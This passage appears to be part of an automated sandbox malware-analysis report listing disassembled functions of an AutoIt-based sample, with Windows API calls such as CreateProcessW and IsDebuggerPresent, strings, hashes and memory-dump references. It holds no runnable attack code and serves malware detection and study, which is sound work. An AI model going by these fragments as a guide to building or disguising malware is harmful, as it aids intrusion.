                                                                                                                        • Opcode ID: d17f4134213f96ca80fb91de24cd8f623c52bfb01e802f5132f76fa6234a0749
                                                                                                                        • Instruction ID: e6d5d89768519da2c9c260b4bbbc8bba5980cd1a662430eed823d9d6473b024d
                                                                                                                        • Opcode Fuzzy Hash: d17f4134213f96ca80fb91de24cd8f623c52bfb01e802f5132f76fa6234a0749
                                                                                                                        • Instruction Fuzzy Hash: 79016D71900119AFEB50EF94DC95EED7BACFB64340F80C0A5F649AB150DE305E88DB90
                                                                                                                        Function 0052A4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0052A529
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer_wcslen
                                                                                                                        • String ID: ,%^$3yV
                                                                                                                        • API String ID: 2551934079-817577063
                                                                                                                        • Opcode ID: 3d492e377663612434aeece31e17e115a4dd26e799b10a603d7cd03b3f516d98
                                                                                                                        • Instruction ID: 7c970d733234b0c6971b9745d9ffd2b6b1bc791d4476596c126bdaaeb97af815
                                                                                                                        • Opcode Fuzzy Hash: 3d492e377663612434aeece31e17e115a4dd26e799b10a603d7cd03b3f516d98
                                                                                                                        • Instruction Fuzzy Hash: 6401F73270066197CE08F768E86FA9E7F68BF86710F401425F9025B1C2DE509D458AD7
                                                                                                                        Function 005A90A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
                                                                                                                        • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0056769C,?,?,?), ref: 005A9111
                                                                                                                          • Part of subcall function 00529944: GetWindowLongW.USER32(?,000000EB), ref: 00529952
                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 005A90F7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow$MessageProcSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 982171247-2594219639
                                                                                                                        • Opcode ID: 11b5ef4bde037607f59e94918fe6908e22db23659264ebb73729225f4baf3cb3
                                                                                                                        • Instruction ID: 0fa4651ccdebed4f0b1a18731d5e397e7ede18a32d9617b9880877b39e981fdb
                                                                                                                        • Opcode Fuzzy Hash: 11b5ef4bde037607f59e94918fe6908e22db23659264ebb73729225f4baf3cb3
                                                                                                                        • Instruction Fuzzy Hash: FC01BC34204225ABDB259F14DC89EAA3FE6FF87365F100428F9550B2E1CB326845DB60
                                                                                                                        Function 005A8172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,005E3018,005E305C), ref: 005A81BF
                                                                                                                        • CloseHandle.KERNEL32 ref: 005A81D1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                                        • String ID: \0^
                                                                                                                        • API String ID: 3712363035-3379709126
                                                                                                                        • Opcode ID: 32db07969f3fce4702b68c3c4357e8697df40c1f1b821e513b0bd5300fc3f239
                                                                                                                        • Instruction ID: 199575348d26d12ddfc890ce9e6295e2c54b067e2b0307b05e0c5fef0570b743
                                                                                                                        • Opcode Fuzzy Hash: 32db07969f3fce4702b68c3c4357e8697df40c1f1b821e513b0bd5300fc3f239
                                                                                                                        • Instruction Fuzzy Hash: AAF089B1640340BEE7246761AC4DFB73E9CEB15750F000461FB48DB1A1D6758E14A3F4
                                                                                                                        Function 0057246C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00572480
                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00572497
                                                                                                                          • Part of subcall function 005723DB: SendMessageW.USER32(?,0000102B,?,00000000), ref: 0057243B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3850602802-2594219639
                                                                                                                        • Opcode ID: 6e189181f0dab11b99e0d497d292a838ae1ef30b59199a979458161d1bc60889
                                                                                                                        • Instruction ID: af1af339c25da53314a31d07aa113ce24689494d70bdc41a5fd740425ad1f828
                                                                                                                        • Opcode Fuzzy Hash: 6e189181f0dab11b99e0d497d292a838ae1ef30b59199a979458161d1bc60889
                                                                                                                        • Instruction Fuzzy Hash: 3BF0E230601121BAEF205B1ADC0ECDFBF6DEF96760F104014B409A6151CAA15D41E7E0
                                                                                                                        Function 0059747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: 3, 3, 16, 1
                                                                                                                        • API String ID: 176396367-3042988571
                                                                                                                        • Opcode ID: b97c82e97b9f76108d7faa4ffa72d9c8ab74e129d18355eba94377ff6c9fba8e
                                                                                                                        • Instruction ID: 0dbe8ab5f30028e2020a1f2af57ed84f5bd2056c98449352165aaefa24bcd8b5
                                                                                                                        • Opcode Fuzzy Hash: b97c82e97b9f76108d7faa4ffa72d9c8ab74e129d18355eba94377ff6c9fba8e
                                                                                                                        • Instruction Fuzzy Hash: 5FE02B03225321109B3112799CC5B7F5F8DFFCD760B14182BF989C2267EAA49D9193A0
                                                                                                                        Function 00572BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00572BFA
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00572C2A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3850602802-2594219639
                                                                                                                        • Opcode ID: 4b858b467d1ef3224f8c28c241ba5c80f3a9df0360f97c80c1572a10b0960b81
                                                                                                                        • Instruction ID: 12a14f69b63b6ae8f9572a3f81beaa079806676cfbb11216b17885bd46ab7a22
                                                                                                                        • Opcode Fuzzy Hash: 4b858b467d1ef3224f8c28c241ba5c80f3a9df0360f97c80c1572a10b0960b81
                                                                                                                        • Instruction Fuzzy Hash: C9F08C75240304BBFB126A84AC4AFAA3F5CBB65761F004014B7495E091CAA25C40A7A0
                                                                                                                        Function 00572D60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0057286B: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00572884
                                                                                                                          • Part of subcall function 0057286B: SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 005728B6
                                                                                                                        • SendMessageW.USER32(?,0000110B,00000005,00000000), ref: 00572D80
                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00572D90
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3850602802-2594219639
                                                                                                                        • Opcode ID: eed4dbad25c5d49d361ed7c6de48adf35c045f0f88f60ce4eae51cf7acef72ef
                                                                                                                        • Instruction ID: b8ef330422fb3be5a52e4ba40538d13bee08585bcdcd56b087dee1976e7968fb
                                                                                                                        • Opcode Fuzzy Hash: eed4dbad25c5d49d361ed7c6de48adf35c045f0f88f60ce4eae51cf7acef72ef
                                                                                                                        • Instruction Fuzzy Hash: 33E0D8353483057FF7310A51AC4AEA33F6CE759751F104026F3096D191DEA3CC117560
                                                                                                                        Function 005A5829 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 005A5855
                                                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 005A5877
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InvalidateMessageRectSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 909852535-2594219639
                                                                                                                        • Opcode ID: 09adaba7eded40b39f32081bef1c3b8c71db020025f96cb006f36e5660f1f45a
                                                                                                                        • Instruction ID: 070f7216fe2c3ffd443364afb8817ee189b8b209ad9d4437d1c0e154fbd18557
                                                                                                                        • Opcode Fuzzy Hash: 09adaba7eded40b39f32081bef1c3b8c71db020025f96cb006f36e5660f1f45a
                                                                                                                        • Instruction Fuzzy Hash: 9EF08232604140EEDB21CB69DC44FEEBFF8EB96321F0445B2E65ADE051E6308A85DB60
                                                                                                                        Function 00570B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00570B23
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message
                                                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                                                        • API String ID: 2030045667-4017498283
                                                                                                                        • Opcode ID: f12100749c351d9978d8bbec403c98053fb7ecd3bc5779e2906737399fcb70b7
                                                                                                                        • Instruction ID: 7e4c69ad8a3154ecb3eab911f476bee69323bb0faac76fd07e8a519cd20152dc
                                                                                                                        • Opcode Fuzzy Hash: f12100749c351d9978d8bbec403c98053fb7ecd3bc5779e2906737399fcb70b7
                                                                                                                        • Instruction Fuzzy Hash: 8AE0D8322443192AD31437547C07F8D7FC8FF06B20F10042BF758555C38EE1689056A9
                                                                                                                        Function 00530D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0052F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00530D71,?,?,?,0051100A), ref: 0052F7CE
                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,0051100A), ref: 00530D75
                                                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0051100A), ref: 00530D84
                                                                                                                        Strings
                                                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00530D7F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                        • API String ID: 55579361-631824599
                                                                                                                        • Opcode ID: aea7f27dbaea130a961ef3b5b8875058a0ec245fa07bdaa42d00e76bec545277
                                                                                                                        • Instruction ID: 928c34918856d7bb29dd197693750a8d2d268d4c437d567f50edcac5761334f2
                                                                                                                        • Opcode Fuzzy Hash: aea7f27dbaea130a961ef3b5b8875058a0ec245fa07bdaa42d00e76bec545277
                                                                                                                        • Instruction Fuzzy Hash: A8E06D742007518BD7609FB8E41834A7FE4BF15744F004D2DE4C2C6691DBB0E4889B91
                                                                                                                        Function 0052E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0052E3D5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer
                                                                                                                        • String ID: 0%^$8%^
                                                                                                                        • API String ID: 1385522511-2219163478
                                                                                                                        • Opcode ID: 9d555d80d306128dcd2a2438f01b95a601c879dab61278852ec3b23f3fed72d9
                                                                                                                        • Instruction ID: 109e54cbb7a2779ec71da4751c73cd58f25d60cdef7062a304f4a2b57a14564b
                                                                                                                        • Opcode Fuzzy Hash: 9d555d80d306128dcd2a2438f01b95a601c879dab61278852ec3b23f3fed72d9
                                                                                                                        • Instruction Fuzzy Hash: E9E02631400BB4CBC60CD718FAAAA8C3B99BF66321F1019AAE0828F1DDDBB038419654
                                                                                                                        Function 0056D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LocalTime
                                                                                                                        • String ID: %.3d$X64
                                                                                                                        • API String ID: 481472006-1077770165
                                                                                                                        • Opcode ID: b8409e17d4200147f0b9e367c3f296fab4efbdfc5dee24edf01ed9c74ccb4cf2
                                                                                                                        • Instruction ID: 729f93c779faf7c5fefaa4e5baeb76e7960134e890187afc99c36b062005929c
                                                                                                                        • Opcode Fuzzy Hash: b8409e17d4200147f0b9e367c3f296fab4efbdfc5dee24edf01ed9c74ccb4cf2
                                                                                                                        • Instruction Fuzzy Hash: 08D012B9D08119EACB9096D0DC599B9BF7CBF19301F508C63F80693040E728C5086771
                                                                                                                        Function 005A2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005A236C
                                                                                                                        • PostMessageW.USER32(00000000), ref: 005A2373
                                                                                                                          • Part of subcall function 0057E97B: Sleep.KERNEL32 ref: 0057E9F3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                        • Opcode ID: 7b2092d33540409cbf0eaf3ec833ed144daefd482c603b64476492f20de3fcf9
                                                                                                                        • Instruction ID: ec4612f7faff35dbf9ca8e59b975b5bf59650b54b771ba011fdf326b28704b8e
                                                                                                                        • Opcode Fuzzy Hash: 7b2092d33540409cbf0eaf3ec833ed144daefd482c603b64476492f20de3fcf9
                                                                                                                        • Instruction Fuzzy Hash: 6DD0C9327813147AE674A774AC0FFC67E14AB6AB10F0049167755AA1D0C9A0A8059A54
                                                                                                                        Function 005A2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005A232C
                                                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 005A233F
                                                                                                                          • Part of subcall function 0057E97B: Sleep.KERNEL32 ref: 0057E9F3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                        • Opcode ID: 0c05fbe7688509eec5cb5da9749bcd971773cbf62077507603128322a26c8ae8
                                                                                                                        • Instruction ID: 8de9d5149be15e572fdd04aa17f7a7b24b8beb12ead648874b83316531c9eaa7
                                                                                                                        • Opcode Fuzzy Hash: 0c05fbe7688509eec5cb5da9749bcd971773cbf62077507603128322a26c8ae8
                                                                                                                        • Instruction Fuzzy Hash: E8D0C936794314BAE674A774AC0FFC67E14AB66B10F0049167759AA1D0C9A0A8059A54
                                                                                                                        Function 00572313 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 0057231F
                                                                                                                        • SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 0057232D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3850602802-2594219639
                                                                                                                        • Opcode ID: 40800b604f8e04eae843b923f0ae506c64298675f4db6ec7430a61ff777a58cc
